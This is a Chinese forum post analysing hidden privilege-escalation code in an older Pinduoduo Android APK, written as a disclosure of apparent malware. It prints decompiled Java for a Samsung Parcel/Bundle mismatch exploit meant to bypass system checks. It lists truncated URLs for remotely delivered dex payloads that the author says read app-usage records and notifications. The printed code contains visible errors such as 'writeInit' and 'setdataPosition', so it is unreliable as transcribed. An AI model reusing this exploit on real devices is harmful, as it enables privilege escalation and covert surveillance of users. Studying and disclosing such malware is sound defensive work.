拼多多apk内嵌提权代码，及动态下发dex分析

mind

拼多多apk内嵌提权代码，及动态下发dex分析

参考「 深蓝洞察 」的文章：https://mp.weixin.qq.com/s/P_EYQxOEupqdU0BJMRqWsw （Bundle 风水 - Android Parcel 序列化与反序列化不匹配系列漏洞，实现 0day/Nday 攻击，从而绕过系统校验，获取系统级 StartAnyWhere 能力）
https://github.com/xuuhaoo/pinduoduo_backdoor
复现流程如下：
下载3月5日前更新的（6.50版本前）的拼多多apk，如6.49版本：
https://com-xunmeng-pinduoduo.en ... d/download/91472728
解压apk文件，找到拼多多apk中，提权代码所在的文件位置：
pinduoduo-6-49-0.zip\assets\component\com.xunmeng.pinduoduo.AliveBaseAbility.7z\com.xunmeng.pinduoduo.AliveBaseAbility\vmp_src\mw1.bin
以上是一个加VMP壳的dex文件，脱壳还原出代码，可以找到针对不同手机厂商系统的多个用于提权的漏洞利用代码，胆子相当的大，比如利用三星手机“com.samsung.android.cepproxyks.CertByte”的提权漏洞，代码如下：

[Java] 纯文本查看 复制代码

// assets/component/com.xunmeng.pinduoduo.AliveBaseAbilitiy// [Manwei]// com/xunmeng/pinduoduo/android_pull_ablity_comp/pullstartup/SamsungAlivePullStartup 
Public static Bundle makeBundleForSamsungSinceP(Intent intent){
   Bundle bundle = new Bundle();
   Parcel obtain = Parcel.obtain();
   Parcel obtain2 = Parcel.obtain();
   Parcel obtain3 = Parcel.obtain();
   obtain2.writeInt(3);
   obtain2.writeInt(13);
   obtain2.writeInt(72);
   obtain2.writeInt(3);
   obtain2.writeInt(0);
   obtain2.writeInt(0);
   obtain2.writeInt(0);
   obtain2.writeInt(0);
   obtain2.writeInt(0);
   obtain2.writeInt(4);
   obtain2.writeString("com.samsung.android.cepproxyks.CertByte");
   obtain2.writeInt(0);
   byte b[] = new byte[0];
   obtain2.writeByteArray(b);
   obtain2.writeInt(0);
   obtain2.writeInt(13);
   obtain2.writeInt(72);
   obtain2.writeInt(53);
   obtain2.writeInt(0);
   obtain2.writeInt(0);
   obtain2.writeInt(0);
   obtain2.writeInt(0);
   obtain2.writeInt(0);
   obtain2.writeInt(1);
   obtain2.writeInt(1);
   obtain2.writeInt(13);
   obtain2.writeInt(72);
   obtain2.writeInt(48);
   obtain2.writeInt(0);
   obtain2.writeInt(0);
   obtain2.writeInt(0);
   obtain2.writeInt(0);
   obtain2.writeInt(0);
   obtain2.writeInt(13);
   obtain2.writeInt(-1);
   int dataPosition = obtain2.dataPosition();
   obtain2.writeString("intent");
   obtain2.writeInt(4);
   obtain2.writeString("android.content.Intent");
   obtain2.writeToParcel(obtain3, 0);
   obtain2.appendFrom(obtain3, 0, obtain3.dataSize());
   int dataPosition2 = obtain2.dataPosition();
   obtain2.setDataPosition(dataPosition2 - 4);
   obtain2.writeInit(dataPosition2 -dataPosition);
   obtain2.setdataPosition(dataPosition2);
   int dataSize = obtain2.dataSize();
   obtain.writeInt(dataSize);
   obtain.writeInt(1279544898);
   obtain.appendFrom(obtain2, 0, dataSize);
   obtain.setDataPosition(0);
   bundle.readFromParcel(obtain);
   return bundle;
}

提权后，就开始瞎搞了，动态下发dex，开始给自己保活，防卸载，然后搞数据，这部分代码比较通俗易懂， 比如：
1a68d982e02fc22b464693a06f528fac.dex 读取用户手机上的app使用记录
95cd95ab4d694ad8bdf49f07e3599fb3.dex 读取用户手机的应用通知，这一波各大公司app全灭了吧？
自己去dex目录看吧。
部分dex文件的下载地址（3月3日已被拼多多从CDN服务器上删除）：
https://commfile.pddpic.com/gale ... 9a-b4c35ec0dd71.dex
https://commfile.pddpic.com/gale ... 9a-b4c35ec0dd71.dex
https://commfile.pddpic.com/gale ... 9a-b4c35ec0dd71.dex
https://commfile.pddpic.com/gale ... 9a-b4c35ec0dd71.dex
https://commfile.pddpic.com/gale ... c7-930872f91c9b.dex
https://commfile.pddpic.com/gale ... c7-930872f91c9b.dex
https://commfile.pddpic.com/gale ... c7-930872f91c9b.dex
https://commfile.pddpic.com/gale ... 9c-637efafdd1c6.dex
https://commfile.pddpic.com/gale ... aa-cdebeb9549f2.dex
https://commfile.pddpic.com/gale ... e7-4d5e72a01266.dex
https://commfile.pddpic.com/gale ... 6d-8bc3eb1f2d03.dex
https://commfile.pddpic.com/gale ... ea-1249ddfd5505.dex
https://commfile.pddpic.com/gale ... 31-eee246aeba95.dex
https://commfile.pddpic.com/gale ... d4-7aa7c364b65c.dex
https://commfile.pddpic.com/gale ... 18-163c9cb7c2df.dex
https://commfile.pddpic.com/gale ... d5-92cdf156e585.dex
https://commfile.pddpic.com/gale ... 8b-94aa773af81c.dex
https://commfile.pddpic.com/gale ... a6-0a2f0bfdd493.dex
https://commfile.pddpic.com/gale ... 10-12635b9640b2.dex
https://commfile.pddpic.com/gale ... dd-2a83444f9cd6.dex
https://commfile.pddpic.com/gale ... a3-e70b938d8f07.dex
https://commfile.pddpic.com/gale ... a3-e70b938d8f07.dex
https://commfile.pddpic.com/gale ... 79-543621ba5422.dex
https://commfile.pddpic.com/gale ... a1-96f85b614f2b.dex
https://commfile.pddpic.com/gale ... 1b-70200fc38eaa.dex
https://commfile.pddpic.com/gale ... 72-2a47a1115c69.dex
https://commfile.pddpic.com/gale ... 80-2ec0ab1bc775.dex
https://commfile.pddpic.com/gale ... b9-eeb49c07bf3c.dex
https://commfile.pddpic.com/gale ... 6f-90750aa18e18.dex
https://commfile.pddpic.com/gale ... 3a-1083c5cca7ae.dex
https://commfile.pddpic.com/gale ... fe-c186b548c34e.dex
https://commfile.pddpic.com/gale ... b4-8114d342e6c0.dex
https://commfile.pddpic.com/gale ... 2e-f92b794d7abf.dex
https://commfile.pddpic.com/sdfi ... 64693a06f528fac.dex
https://commfile.pddpic.com/sdfi ... 0bc800e912034fc.dex
https://commfile.pddpic.com/sdfi ... 0bc800e912034fc.dex
https://commfile.pddpic.com/sdfi ... 0bc800e912034fc.dex
https://commfile.pddpic.com/sdfi ... 0bc800e912034fc.dex
https://commfile.pddpic.com/sdfi ... fce7491887f1306.dex
https://commfile.pddpic.com/sdfi ... 29956aabcdfe004.dex
https://commfile.pddpic.com/sdfi ... 29956aabcdfe004.dex
https://commfile.pddpic.com/sdfi ... ff86fe489dffd22.dex
https://commfile.pddpic.com/sdfi ... 29b4f267b6ccf4d.dex
https://commfile.pddpic.com/sdfi ... 50e6fa34e18b2a0.dex
https://commfile.pddpic.com/sdfi ... 50e6fa34e18b2a0.dex
https://commfile.pddpic.com/sdfi ... 50e6fa34e18b2a0.dex
https://commfile.pddpic.com/sdfi ... 50e6fa34e18b2a0.dex
https://commfile.pddpic.com/sdfi ... 3ee00c2ecf06737.dex
https://commfile.pddpic.com/sdfi ... 3ee00c2ecf06737.dex
https://commfile.pddpic.com/sdfi ... 0d53382b8adcfd6.dex
https://commfile.pddpic.com/sdfi ... a2ac11f412cccc7.dex
https://commfile.pddpic.com/sdfi ... a2ac11f412cccc7.dex
https://commfile.pddpic.com/sdfi ... 5237797138d246a.dex
https://commfile.pddpic.com/sdfi ... fb96e523807ca6b.dex
https://commfile.pddpic.com/sdfi ... fb96e523807ca6b.dex
https://commfile.pddpic.com/sdfi ... bd1a26998b6485a.dex
https://commfile.pddpic.com/sdfi ... 01806b5b417c9f5.dex
https://commfile.pddpic.com/sdfi ... 9e7c8ae7682fa61.dex
https://commfile.pddpic.com/sdfi ... 900c19e700edbed.dex
https://commfile.pddpic.com/sdfi ... bac39730616fa9b.dex
https://commfile.pddpic.com/sdfi ... e94002e8e781192.dex
https://commfile.pddpic.com/sdfi ... c47f6e44a37b8a4.dex
https://commfile.pddpic.com/sdfi ... 70d9a8ff4fc5295.dex
https://commfile.pddpic.com/sdfi ... fa3299d3afd9736.dex
https://commfile.pddpic.com/sdfi ... 5741ce524577dd0.dex
https://commfile.pddpic.com/sdfi ... ee4a4ceb2374669.dex
https://commfile.pddpic.com/sdfi ... d5fdd57f6abf238.dex
https://commfile.pddpic.com/sdfi ... 6e61951cb14c781.dex
https://commfile.pddpic.com/sdfi ... 5869165cfcd13cb.dex
https://commfile.pddpic.com/sdfi ... 8baef558ee79deb.dex
https://commfile.pddpic.com/sdfi ... 49994ffeb0ee0b6.dex
https://commfile.pddpic.com/sdfi ... 403a69e7ee877a7.dex
https://commfile.pddpic.com/sdfi ... 401efaddfc8ad7f.dex
https://commfile.pddpic.com/sdfi ... df49f07e3599fb3.dex